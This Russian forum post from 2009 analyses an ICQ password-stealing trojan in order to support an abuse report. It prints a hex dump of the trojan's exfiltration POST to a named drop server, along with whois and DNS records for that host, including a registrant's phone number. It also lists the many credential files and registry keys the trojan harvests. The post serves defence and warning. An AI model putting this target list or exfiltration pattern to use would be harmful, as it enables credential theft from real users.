MCRF.RU - Показать сообщение отдельно

Тема: Новый ICQ троян

Показать сообщение отдельно

Новое

Фортэс
Участник

Сообщений:: 368

Регистрация:: 02.12.2008

Возраст:: 45

Рейтинг мнений: 500

Вес репутации: 320

Re: Новый ICQ троян #13

Mad Dog, вот дополнительные данные для абузы.

все пароли шлются через сокет на адрес http://www.ch-mz.ru/images/catalog/icon/fg54h.php.

Вот конкретно текст отправки через Send после чтения всех паролей

Код:

00A40020  50 4F 53 54 20 2F 69 6D 61 67 65 73 2F 63 61 74  POST /images/cat
00A40030  61 6C 6F 67 2F 69 63 6F 6E 2F 66 67 35 34 68 2E  alog/icon/fg54h.
00A40040  70 68 70 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F  php HTTP/1.0..Ho
00A40050  73 74 3A 20 77 77 77 2E 63 68 2D 6D 7A 2E 72 75  st: www.ch-mz.ru
00A40060  0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20  ..Content-Type:
00A40070  61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77  application/x-ww
00A40080  77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65  w-form-urlencode
00A40090  64 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B  d..Connection: K
00A400A0  65 65 70 2D 41 6C 69 76 65 0D 0A 50 72 61 67 6D  eep-Alive..Pragm
00A400B0  61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 55 73 65  a: no-cache..Use
00A400C0  72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61  r-Agent: Mozilla
00A400D0  2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65  /4.0 (compatible
00A400E0  3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64  ; MSIE 6.0; Wind
00A400F0  6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 3B  ows NT 5.1; SV1;
00A40100  20 49 6E 66 6F 50 61 74 68 2E 32 3B 20 2E 4E 45   InfoPath.2; .NE
00A40110  54 20 43 4C 52 20 32 2E 30 2E 35 30 37 32 37 3B  T CLR 2.0.50727;
00A40120  20 49 6E 66 6F 50 61 74 68 2E 31 29 0D 0A 43 6F   InfoPath.1)..Co
00A40130  6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 33 35  ntent-Length: 35
00A40140  35 36 0D 0A 0D 0A 61 3D 26 62 3D 67 74 26 64 3D  56....a=&b=gt&d=
00A40150  72 74 26 63 3D 00 00 00 00 00 00 00 00 00 00 00  rt&c=...........

сами данные с паролями я вырезал.

Код:

Traceroute
Tracing route to www.ch-mz.ru [87.242.98.91]...

hop rtt rtt rtt   ip address fully qualified domain name 
1 4 0 1   70.84.211.97 61.d3.5446.static.theplanet.com 
2 0 0 0   70.87.254.5 po101.dsr02.dllstx5.theplanet.com 
3 0 0 0   70.85.127.109 po52.dsr02.dllstx3.theplanet.com 
4 0 0 0   70.87.253.21 et3-1.ibr03.dllstx3.theplanet.com 
5 32 32 32   70.87.253.190 be.fd.5746.static.theplanet.com 
6 32 51 32   206.223.115.96 equinix.ashb.retn.net 
7 143 142 142   87.245.233.205 xe120-2.rt.tc1.sto.se.retn.net 
8 193 167 167   90.156.216.32 max2.pvc.masterhost.ru 
9 167 191 168   87.242.98.91 v1902.vps.masterhost.ru 

Trace complete

Думаю этого будет для них достаточно

сайт http://www.ch-mz.ru зарегистрирован у хостера www.masterhost.ru . Можно проверить через этот сервис

Код:

Address lookup
canonical name ch-mz.ru. 
aliases www.ch-mz.ru
 
addresses 87.242.98.91
 

Domain Whois record
Queried whois.ripn.net with "ch-mz.ru"...

% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

ВЛАДЕЛЕЦ САЙТА
domain:     CH-MZ.RU
type:       CORPORATE
nserver:    ns1.budagovsky.ru.
nserver:    ns2.budagovsky.ru.
state:      REGISTERED, DELEGATED
person:     Private Person
phone:      +7 9021 762483
e-mail:     [email protected]
registrar:  REGTIME-REG-RIPN
created:    2007.12.19
paid-till:  2009.12.19
source:     TC-RIPN


Last updated on 2009.09.25 00:02:05 MSK/MSD


Network Whois record
Queried whois.ripe.net with "-B 87.242.98.91"...

% Information related to '87.242.98.0 - 87.242.99.255'

inetnum:        87.242.98.0 - 87.242.99.255
netname:        MASTERHOST-VPS-2
descr:          MasterHost VPS services
country:        RU
admin-c:        MHST-RIPE
tech-c:         MHST-RIPE
status:         ASSIGNED PA
notify:         [email protected]
mnt-by:         MASTERHOST-MNT
changed:        [email protected] 20060502
source:         RIPE

role:           MASTERHOST NOC
address:        .masterhost
address:        Lyalin lane 3, bld 3
address:        105062 Moscow
address:        Russia
phone:          +7 495 7729720
fax-no:         +7 495 7729723
e-mail:         [email protected]
remarks:        ----------------------------------------------------------
remarks:        MASTERHOST is available 24 x 7
remarks:        ----------------------------------------------------------
remarks:        Points of contact for MASTERHOST Network Operations
remarks:        ----------------------------------------------------------
remarks:        Routing and peering issues:       [email protected]
remarks:        SPAM and Network security issues: [email protected]
remarks:        Mail and News issues:             [email protected]
remarks:        Customer support:                 [email protected]
remarks:        General information:              [email protected]
remarks:        ----------------------------------------------------------
admin-c:        AAS-RIPE
tech-c:         AAS-RIPE
tech-c:         UNK-RIPE
nic-hdl:        MHST-RIPE
notify:         [email protected]
abuse-mailbox:  [email protected]
mnt-by:         MASTERHOST-MNT
changed:        [email protected] 20050714
changed:        [email protected] 20050802
changed:        [email protected] 20070410
source:         RIPE

% Information related to '87.242.64.0/18AS25532'

route:          87.242.64.0/18
descr:          .masterhost
origin:         AS25532
notify:         [email protected]
mnt-by:         MASTERHOST-MNT
changed:        [email protected] 20050729
source:         RIPE

DNS records
name class type data time to live 
www.ch-mz.ru IN CNAME ch-mz.ru 86127s (23:55:27) 
ch-mz.ru IN MX preference: 10 
exchange: mail.ch-mz.ru 
 86400s (1.00:00:00) 
ch-mz.ru IN SOA server: ns2.budagovsky.ru 
email: ars.budagovsky.ru 
serial: 0 
refresh: 10800 
retry: 3600 
expire: 604800 
minimum ttl: 10800 
 86400s (1.00:00:00) 
ch-mz.ru IN NS ns2.budagovsky.ru 86400s (1.00:00:00) 
ch-mz.ru IN NS ns1.budagovsky.ru 86400s (1.00:00:00) 
ch-mz.ru IN A 87.242.98.91 86400s (1.00:00:00) 
91.98.242.87.in-addr.arpa IN PTR v1902.vps.masterhost.ru 628s (00:10:28)

В первый раз я не совсем точно посмотрел что именно воруется из системы. Вот примерный список.

файлы:

Код:

C:\WINDOWS\WCX_FTP.INI
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\PROFILE\WAND.DAT
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\MAIL\ACCOUNTS.INI
C:\Documents and Settings\Пользователь\Application Data\THUNDERBIRD\PROFILES.INI
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\.gaim\accounts.xml
C:\Documents and Settings\Пользователь\Application Data\FileZilla\sitemanager.xml
C:\WINDOWS\VD3User.dat
C:\WINDOWS\Vd3main.dat
C:\Program Files\FTP Commander\Ftplist.txt
C:\Program Files\FTP Commander Pro\Ftplist.txt
C:\Program Files\FTP Commander Deluxe\Ftplist.txt
C:\Program Files\Total Commander\Profiles\Prof\ftp.ini
C:\WINDOWS\edialer.ini
C:\Program Files\Trillian\User Settings\*.*

ключи реестра

Код:

SOFTWARE\RIT\The Bat!
SOFTWARE\Mirabilis\ICQ\DefaultPrefs
SOFTWARE\Mirabilis\ICQ\NewOwners
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
Software\RimArts\B2\Settings
Software\Microsoft\Internet Account Manager\Accounts
SOFTWARE\Far\Plugins\FTP\Hosts
Software\Mail.Ru\Agent\mra_logins
Software\CoffeeCup Software\Internet\Profiles

Всем удачи

берегите свои данные

Последний раз редактировалось Фортэс; 25.09.2009 в 01:01.

25.09.2009, 00:15

15 пользователя(ей) добавили плюсы

bond95 (25.09.2009), gena (25.09.2009), Habib (25.09.2009), IgorYas (25.09.2009), Mad Dog (25.09.2009), MobilaGSM (25.09.2009), Morfeus (25.09.2009), Nics (25.09.2009), NoName® (25.09.2009), Oleg_Rus (25.09.2009), pontiak (25.09.2009), SergDeParchi (25.09.2009), ~~shirokov~~ (25.09.2009), Vasilio (19.10.2009), ~~vitpod~~ (25.09.2009)

Фортэс vbmenu_register("postmenu_179670", false); Участник

Фортэс
Участник